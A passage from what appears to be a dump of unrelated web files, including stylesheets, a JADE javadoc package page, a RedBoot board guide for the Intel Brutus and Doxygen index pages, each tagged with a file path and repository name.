margin-top: 5px;
display: flex;
justify-content: space-around;
}
.eva-cpu-components .eva-cpu-element {
margin: 5px;
padding: 2px;
}
.eva-cpu-components .eva-next-instruction input {
width: 5em;
padding: 2px;
}
.eva-cpu-components span {
padding: 2px;
}
.eva-cpu-components #evaluator,
.eva-cpu-components .eva-run-status {
display: inline-block;
border: 1px solid #BBB;
padding: 2px;
background-color: #F8F8F8;
}
.eva-cpu-components #evaluator {
width: 200px;
}
.eva-cpu-components .eva-run-status {
width: 70px;
}
.eva-cpu-components .eva-event-log {
font-size: 80%;
display: inline-block;
width: 200px;
height: 80px;
overflow-y: scroll;
border: 1px solid #BBB;
padding: 2px;
background-color: #F8F8F8;
}
.eva-label {
font-weight: bold;
}
.eva-code-memory-container {
display: flex;
justify-content: space-around;
}
.eva-code {
vertical-align: top;
border: 2px solid #C7C4C4;
width: 49%;
display: inline-block;
padding: 5px;
margin-left: 5px;
}
.eva-code ol {
padding-left: 0;
margin-left: 2em;
}
.eva-code ol li:nth-child(2n+1) {
background-color: #FAFAFA;
}
.eva-code ol li {
color: black;
}
.eva-code ol li pre {
margin: 0;
background-color: inherit;
color: inherit;
border: none;
padding: 0;
display: inline;
}
.eva-code ol li pre.current-statement {
background-color: yellow;
}
.eva-memory-container {
vertical-align: top;
border: 2px solid #C7C4C4;
width: 49%;
display: inline-block;
margin-right: 5px;
padding: 5px;
}
.eva-memory p.animating {
background-color: yellow;
}
.eva-memory .nvar-overlay {
position: absolute;
background-color: #C7C4C4;
font-size: 100%;
opacity: 1;
}
.eva-memory .variable {
display: flex;
justify-content: space-between;
margin-top: 0.5em;
}
.eva-memory .variable .name-type-container {
/*display: inline-block;*/
flex-grow: 1;
width: 14em;
}
.eva-memory .variable .type {
font-size: 50%;
font-weight: bold;
text-transform: uppercase;
}
.eva-memory .variable .value {
flex-grow: 1;
/*display: inline-block;*/
}
.eva-memory .variable .value input {
width: 95%;
}
.eva-controls {
margin: 5px;
padding: 5px;
background-color: #F4F4F4;
}
.eva-controls button {
padding: 2px;
margin: 4px;
} |
_site-archive/post/7007134732/rack-mounted-mining/index.html | sunnankar/bitcoinminer | <html><head><link rel="canonical" href="/2017/02/10/2011-06-28-rack-mounted-mining.html"><meta http-equiv="refresh" content="0; url=/2017/02/10/2011-06-28-rack-mounted-mining.html"></head><body></body></html>
|
gramps50/addons/example_DynamicWeb2/place.html | belissent/testing-example-reports | <!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>Place - My Family Tree</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 5.0.0 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="data/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script language="javascript" src="data/dwr_start.js">
</script>
<link href="http://openlayers.org/en/v3.0.0/css/ol.css" rel="stylesheet" type="text/css" />
<script charset="UTF-8" language="javascript" src="dwr_db_indi.js">
</script>
<script charset="UTF-8" language="javascript" src="dwr_db_fam.js">
</script>
<script charset="UTF-8" language="javascript" src="dwr_db_sour.js">
</script>
<script charset="UTF-8" language="javascript" src="dwr_db_cita.js">
</script>
<script charset="UTF-8" language="javascript" src="dwr_db_media.js">
</script>
<script charset="UTF-8" language="javascript" src="dwr_db_place.js">
</script>
<script charset="UTF-8" language="javascript" src="dwr_db_repo.js">
</script>
<script charset="UTF-8" language="javascript" src="dwr_db_surns.js">
</script>
<script charset="UTF-8" language="javascript" src="http://openlayers.org/en/v3.0.0/build/ol.js">
</script>
</head>
<body>
<script language="javascript">
DwrMain(PAGE_PLACE);
</script>
</body>
</html> |
InstantWP_4.4.2/iwpserver/server/Apache/manual/programs/httxt2dbm.html | Timfreaky/ThinkTax | # GENERATED FROM XML -- DO NOT EDIT
URI: httxt2dbm.html.en
Content-Language: en
Content-type: text/html; charset=ISO-8859-1
|
doc/api/jade/domain/FIPAAgentManagement/package-summary.html | LeeboyOver9000/TCC | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="it">
<head>
<!-- Generated by javadoc (version 1.7.0_03) on Tue Dec 09 10:56:12 CET 2014 -->
<title>jade.domain.FIPAAgentManagement (JADE v4.3.3 API)</title>
<meta name="date" content="2014-12-09">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="jade.domain.FIPAAgentManagement (JADE v4.3.3 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li class="navBarCell1Rev">Package</li>
<li>Class</li>
<li><a href="package-use.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../jade/domain/package-summary.html">Prev Package</a></li>
<li><a href="../../../jade/domain/introspection/package-summary.html">Next Package</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?jade/domain/FIPAAgentManagement/package-summary.html" target="_top">Frames</a></li>
<li><a href="package-summary.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 title="Package" class="title">Package jade.domain.FIPAAgentManagement</h1>
<div class="docSummary">
<div class="block">This package contains the definition of the FIPA-Agent-Management ontology
as specified by the FIPA standard
<a href="http://www.fipa.org/specs/fipa00023/"> FIPA Agent Management
Specification </a> - document no. 23 version H (15th August 2001).</div>
</div>
<p>See: <a href="#package_description">Description</a></p>
</div>
<div class="contentContainer">
<ul class="blockList">
<li class="blockList">
<table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Interface Summary table, listing interfaces, and an explanation">
<caption><span>Interface Summary</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Interface</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/ExceptionVocabulary.html" title="interface in jade.domain.FIPAAgentManagement">ExceptionVocabulary</a></td>
<td class="colLast">
<div class="block">This interface contains all the string constants for frame and slot
names of exceptions defined in the
<code>fipa-agent-management</code> ontology.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/FIPAManagementVocabulary.html" title="interface in jade.domain.FIPAAgentManagement">FIPAManagementVocabulary</a></td>
<td class="colLast">
<div class="block">This interface contains all the string constants for frame and slot
names defined in the
<code>fipa-agent-management</code> ontology.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation">
<caption><span>Class Summary</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Class</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/AMSAgentDescription.html" title="class in jade.domain.FIPAAgentManagement">AMSAgentDescription</a></td>
<td class="colLast">
<div class="block">This class implements the concept of the fipa-agent-management ontology
representing the description of an Agent in the AMS catalogue.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/APDescription.html" title="class in jade.domain.FIPAAgentManagement">APDescription</a></td>
<td class="colLast">
<div class="block">This class implements the concept of the fipa-agent-management ontology
representing the description of an agent platform as it can be retrieved
from the AMS.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/APService.html" title="class in jade.domain.FIPAAgentManagement">APService</a></td>
<td class="colLast">
<div class="block">This class implements the concept of the fipa-agent-management ontology
representing the description of a platform service.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/Deregister.html" title="class in jade.domain.FIPAAgentManagement">Deregister</a></td>
<td class="colLast">
<div class="block">This class implements the <code>deregister</code> action of the
<code>fipa-agent-management ontology</code>.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/DFAgentDescription.html" title="class in jade.domain.FIPAAgentManagement">DFAgentDescription</a></td>
<td class="colLast">
<div class="block">This class implements the concept of the fipa-agent-management ontology
representing the description of an agent in the DF catalogue.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/Envelope.html" title="class in jade.domain.FIPAAgentManagement">Envelope</a></td>
<td class="colLast">
<div class="block">This class models an envelope.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/ExceptionOntology.html" title="class in jade.domain.FIPAAgentManagement">ExceptionOntology</a></td>
<td class="colLast">
<div class="block">This class groups into a separated ontology the elements of the
FIPA-Agent-Management-ontology (see FIPA specification document no. 23)
representing generic exceptions.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/FIPAManagementOntology.html" title="class in jade.domain.FIPAAgentManagement">FIPAManagementOntology</a></td>
<td class="colLast">
<div class="block">This class represents the ontology defined by FIPA Agent Management
specifications (document no. 23).</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/GetDescription.html" title="class in jade.domain.FIPAAgentManagement">GetDescription</a></td>
<td class="colLast">
<div class="block">This class implements the <code>get-description</code> action of the
<code>fipa-agent-management ontology</code>.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/Modify.html" title="class in jade.domain.FIPAAgentManagement">Modify</a></td>
<td class="colLast">
<div class="block">This class implements the <code>modify</code> action of the
<code>fipa-agent-management ontology</code>.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/MultiValueProperty.html" title="class in jade.domain.FIPAAgentManagement">MultiValueProperty</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/Property.html" title="class in jade.domain.FIPAAgentManagement">Property</a></td>
<td class="colLast">
<div class="block">This class implements the <code>property</code> type, a pair of a
name and value.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/ReceivedObject.html" title="class in jade.domain.FIPAAgentManagement">ReceivedObject</a></td>
<td class="colLast">
<div class="block">This class implements the <code>received-object</code> object from
the FIPA Agent Management ontology.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/Register.html" title="class in jade.domain.FIPAAgentManagement">Register</a></td>
<td class="colLast">
<div class="block">This class implements the <code>register</code> action of the
<code>fipa-agent-management ontology</code>.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/Search.html" title="class in jade.domain.FIPAAgentManagement">Search</a></td>
<td class="colLast">
<div class="block">This class implements the <code>search</code> action of the
<code>fipa-agent-management ontology</code>.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/SearchConstraints.html" title="class in jade.domain.FIPAAgentManagement">SearchConstraints</a></td>
<td class="colLast">
<div class="block">This class models a search constraint.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/ServiceDescription.html" title="class in jade.domain.FIPAAgentManagement">ServiceDescription</a></td>
<td class="colLast">
<div class="block">This class models a service data type.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Exception Summary table, listing exceptions, and an explanation">
<caption><span>Exception Summary</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Exception</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/AlreadyRegistered.html" title="class in jade.domain.FIPAAgentManagement">AlreadyRegistered</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/FailureException.html" title="class in jade.domain.FIPAAgentManagement">FailureException</a></td>
<td class="colLast">
<div class="block">This class represents a generic FailureException</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/InternalError.html" title="class in jade.domain.FIPAAgentManagement">InternalError</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/MissingArgument.html" title="class in jade.domain.FIPAAgentManagement">MissingArgument</a></td>
<td class="colLast"> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/MissingParameter.html" title="class in jade.domain.FIPAAgentManagement">MissingParameter</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/NotRegistered.html" title="class in jade.domain.FIPAAgentManagement">NotRegistered</a></td>
<td class="colLast"> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/NotUnderstoodException.html" title="class in jade.domain.FIPAAgentManagement">NotUnderstoodException</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/RefuseException.html" title="class in jade.domain.FIPAAgentManagement">RefuseException</a></td>
<td class="colLast">
<div class="block">This class represents a generic RefuseException</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/Unauthorised.html" title="class in jade.domain.FIPAAgentManagement">Unauthorised</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnexpectedAct.html" title="class in jade.domain.FIPAAgentManagement">UnexpectedAct</a></td>
<td class="colLast"> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnexpectedArgument.html" title="class in jade.domain.FIPAAgentManagement">UnexpectedArgument</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnexpectedArgumentCount.html" title="class in jade.domain.FIPAAgentManagement">UnexpectedArgumentCount</a></td>
<td class="colLast"> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnexpectedParameter.html" title="class in jade.domain.FIPAAgentManagement">UnexpectedParameter</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnrecognisedParameterValue.html" title="class in jade.domain.FIPAAgentManagement">UnrecognisedParameterValue</a></td>
<td class="colLast"> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnrecognisedValue.html" title="class in jade.domain.FIPAAgentManagement">UnrecognisedValue</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnsupportedAct.html" title="class in jade.domain.FIPAAgentManagement">UnsupportedAct</a></td>
<td class="colLast"> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnsupportedFunction.html" title="class in jade.domain.FIPAAgentManagement">UnsupportedFunction</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="../../../jade/domain/FIPAAgentManagement/UnsupportedValue.html" title="class in jade.domain.FIPAAgentManagement">UnsupportedValue</a></td>
<td class="colLast"> </td>
</tr>
</tbody>
</table>
</li>
</ul>
<a name="package_description">
<!-- -->
</a>
<h2 title="Package jade.domain.FIPAAgentManagement Description">Package jade.domain.FIPAAgentManagement Description</h2>
<div class="block">This package contains the definition of the FIPA-Agent-Management ontology
as specified by the FIPA standard
<a href="http://www.fipa.org/specs/fipa00023/"> FIPA Agent Management
Specification </a> - document no. 23 version H (15th August 2001).
The package includes all the classes the implement the basic concepts
for managing the platform, such as the description of a service and an
agent, and the throwable exceptions.</div>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li class="navBarCell1Rev">Package</li>
<li>Class</li>
<li><a href="package-use.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../jade/domain/package-summary.html">Prev Package</a></li>
<li><a href="../../../jade/domain/introspection/package-summary.html">Next Package</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?jade/domain/FIPAAgentManagement/package-summary.html" target="_top">Frames</a></li>
<li><a href="package-summary.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small><center>These are the official <i><a href=http://jade.tilab.com target=top>JADE</a></i> API. For these API backward compatibility is guaranteed accross JADE versions</center></small></p>
</body>
</html>
|
doc/html/redboot-guide/brutus.html | satlantis/Ecos | <!-- Copyright (C) 2009 Free Software Foundation, Inc. -->
<!-- This material may be distributed only subject to the terms -->
<!-- and conditions set forth in the Open Publication License, v1.0 -->
<!-- or later (the latest version is presently available at -->
<!-- http://www.opencontent.org/openpub/). -->
<!-- Distribution of the work or derivative of the work in any -->
<!-- standard (paper) book form is prohibited unless prior -->
<!-- permission is obtained from the copyright holder. -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML
><HEAD
><TITLE
>ARM/StrongARM(SA1100) Intel Brutus</TITLE
><meta name="MSSmartTagsPreventParsing" content="TRUE">
<META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.79"><LINK
REL="HOME"
TITLE="RedBoot User's Guide"
HREF="redboot-guide.html"><LINK
REL="UP"
TITLE="Installation and Testing"
HREF="installation-and-testing.html"><LINK
REL="PREVIOUS"
TITLE="ARM/StrongARM(SA110) Intel EBSA 285"
HREF="ebsa285.html"><LINK
REL="NEXT"
TITLE="ARM/StrongARM(SA1100) Intel SA1100 Multimedia Board "
HREF="sa1100mm.html"></HEAD
><BODY
CLASS="SECT1"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="NAVHEADER"
><TABLE
SUMMARY="Header navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TH
COLSPAN="3"
ALIGN="center"
>RedBoot User's Guide</TH
></TR
><TR
><TD
WIDTH="10%"
ALIGN="left"
VALIGN="bottom"
><A
HREF="ebsa285.html"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="80%"
ALIGN="center"
VALIGN="bottom"
>Chapter 5. Installation and Testing</TD
><TD
WIDTH="10%"
ALIGN="right"
VALIGN="bottom"
><A
HREF="sa1100mm.html"
ACCESSKEY="N"
>Next</A
></TD
></TR
></TABLE
><HR
ALIGN="LEFT"
WIDTH="100%"></DIV
><DIV
CLASS="SECT1"
><H1
CLASS="SECT1"
><A
NAME="BRUTUS"
>ARM/StrongARM(SA1100) Intel Brutus</A
></H1
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN4130"
>Overview</A
></H2
><P
>RedBoot
supports both board serial ports on the Brutus board. The default serial port
settings are 38400,8,N,1. flash management is not currently supported. </P
><P
>The following RedBoot configurations are supported:
<DIV
CLASS="INFORMALTABLE"
><P
></P
><A
NAME="AEN4140"
></A
><TABLE
BORDER="1"
FRAME="border"
RULES="all"
CLASS="CALSTABLE"
><COL><COL><COL><COL><THEAD
><TR
><TH
>Configuration</TH
><TH
>Mode</TH
><TH
>Description</TH
><TH
>File</TH
></TR
></THEAD
><TBODY
><TR
><TD
>ROM</TD
><TD
>[ROM]</TD
><TD
>RedBoot running from the board's flash boot
sector.</TD
><TD
>redboot_ROM.ecm</TD
></TR
><TR
><TD
>RAM</TD
><TD
>[RAM]</TD
><TD
>RedBoot running from RAM with RedBoot in the
flash boot sector.</TD
><TD
>redboot_RAM.ecm</TD
></TR
></TBODY
></TABLE
><P
></P
></DIV
></P
></DIV
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN4159"
>Initial Installation Method</A
></H2
><P
>Device programmer is used to program socketed flash parts.</P
></DIV
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN4162"
>Special RedBoot Commands</A
></H2
><P
>None.</P
></DIV
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN4165"
>Memory Maps</A
></H2
><P
>The first level page table is located at physical address 0xc0004000.
No second level tables are used.
<DIV
CLASS="NOTE"
><BLOCKQUOTE
CLASS="NOTE"
><P
><B
>NOTE: </B
>The virtual memory maps in this section use a C and B column to indicate
whether or not the region is cached (C) or buffered (B).</P
></BLOCKQUOTE
></DIV
><TABLE
BORDER="5"
BGCOLOR="#E0E0F0"
WIDTH="70%"
><TR
><TD
><PRE
CLASS="PROGRAMLISTING"
>Physical Address Range Description
----------------------- ----------------------------------
0x00000000 - 0x000fffff Boot ROM
0x08000000 - 0x083fffff Application flash
0x10000000 - 0x100fffff SRAM
0x18000000 - 0x180fffff Chip Select 3
0x20000000 - 0x3fffffff PCMCIA
0x80000000 - 0xbfffffff SA-1100 Internal Registers
0xc0000000 - 0xc7ffffff DRAM Bank 0
0xc8000000 - 0xcfffffff DRAM Bank 1
0xd0000000 - 0xd7ffffff DRAM Bank 2
0xd8000000 - 0xdfffffff DRAM Bank 3
0xe0000000 - 0xe7ffffff Cache Clean
Virtual Address Range C B Description
----------------------- - - ----------------------------------
0x00000000 - 0x003fffff Y Y DRAM Bank 0
0x00400000 - 0x007fffff Y Y DRAM Bank 1
0x00800000 - 0x00bfffff Y Y DRAM Bank 2
0x00c00000 - 0x00ffffff Y Y DRAM Bank 3
0x08000000 - 0x083fffff Y Y Application flash
0x10000000 - 0x100fffff Y N SRAM
0x20000000 - 0x3fffffff N N PCMCIA
0x40000000 - 0x400fffff Y Y Boot ROM
0x80000000 - 0xbfffffff N N SA-1100 Internal Registers
0xe0000000 - 0xe7ffffff Y Y Cache Clean</PRE
></TD
></TR
></TABLE
></P
></DIV
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN4172"
>Platform Resource Usage</A
></H2
><P
>The SA11x0 OS timer is used as a polled timer to provide timeout
support for XModem file transfers.</P
></DIV
><DIV
CLASS="SECT2"
><H2
CLASS="SECT2"
><A
NAME="AEN4175"
>Rebuilding RedBoot</A
></H2
><P
>These shell variables provide the platform-specific information
needed for building RedBoot according to the procedure described in
<A
HREF="rebuilding-redboot.html"
>Chapter 3</A
>:
<TABLE
BORDER="5"
BGCOLOR="#E0E0F0"
WIDTH="70%"
><TR
><TD
><PRE
CLASS="PROGRAMLISTING"
>export TARGET=brutus
export ARCH_DIR=arm
export PLATFORM_DIR=sa11x0/brutus</PRE
></TD
></TR
></TABLE
></P
><P
>The names of configuration files are listed above with the
description of the associated modes.</P
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
><A
HREF="ebsa285.html"
ACCESSKEY="P"
>Prev</A
></TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="redboot-guide.html"
ACCESSKEY="H"
>Home</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="sa1100mm.html"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>ARM/StrongARM(SA110) Intel EBSA 285</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
><A
HREF="installation-and-testing.html"
ACCESSKEY="U"
>Up</A
></TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>ARM/StrongARM(SA1100) Intel SA1100 Multimedia Board</TD
></TR
></TABLE
></DIV
></BODY
></HTML
> |
wp-content/plugins/amazon-auto-links/include/v2/asset/css/aal_templates.css | ashik968/digiplot | .widefat td {
vertical-align: middle;
}
.column-thumbnail {
width: 20%;
}
.disabled {
color: #C5C5C5;
}
.right-button {
float: right;
}
.template-thumbnail{
position: relative;
z-index: 0;
}
.template-thumbnail:hover{
background-color: transparent;
z-index: 50;
}
.template-thumbnail span{ /*CSS for enlarged image*/
position: fixed;
background-color: #FCFCFC;
padding: 5px;
border: 1px dashed gray;
visibility: hidden;
color: black;
text-decoration: none;
}
.template-thumbnail span img{ /*CSS for enlarged image*/
border-width: 0;
padding: 2px;
margin: 0 auto;
}
.template-thumbnail:hover span{ /*CSS for enlarged image on hover*/
visibility: visible;
top: 50px;
}
/* Make fetched template listing images fit in the container */
div.amazon_auto_links_multiple_columns_col div.amazon_auto_links_extension_item img {
max-width: 100% !important;
max-height: 100% !important;
}
|
arduino/libraries/CmdMessenger/Documentation/PC/html/functions_0x6f.html | jgrizou/robot_2WD | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>CmdMessenger: Class Members</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">CmdMessenger
 <span id="projectnumber">3.0</span>
</div>
<div id="projectbrief">CmdMessenger is a serial port messaging library for the .Net / Mono Platform.</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- Generated by Doxygen 1.7.6.1 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Packages</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li class="current"><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="navrow3" class="tabs2">
<ul class="tablist">
<li class="current"><a href="functions.html"><span>All</span></a></li>
<li><a href="functions_func.html"><span>Functions</span></a></li>
<li><a href="functions_enum.html"><span>Enumerations</span></a></li>
<li><a href="functions_prop.html"><span>Properties</span></a></li>
</ul>
</div>
<div id="navrow4" class="tabs3">
<ul class="tablist">
<li><a href="functions.html#index_a"><span>a</span></a></li>
<li><a href="functions_0x62.html#index_b"><span>b</span></a></li>
<li><a href="functions_0x63.html#index_c"><span>c</span></a></li>
<li><a href="functions_0x64.html#index_d"><span>d</span></a></li>
<li><a href="functions_0x65.html#index_e"><span>e</span></a></li>
<li><a href="functions_0x67.html#index_g"><span>g</span></a></li>
<li><a href="functions_0x68.html#index_h"><span>h</span></a></li>
<li><a href="functions_0x69.html#index_i"><span>i</span></a></li>
<li><a href="functions_0x6c.html#index_l"><span>l</span></a></li>
<li><a href="functions_0x6d.html#index_m"><span>m</span></a></li>
<li><a href="functions_0x6e.html#index_n"><span>n</span></a></li>
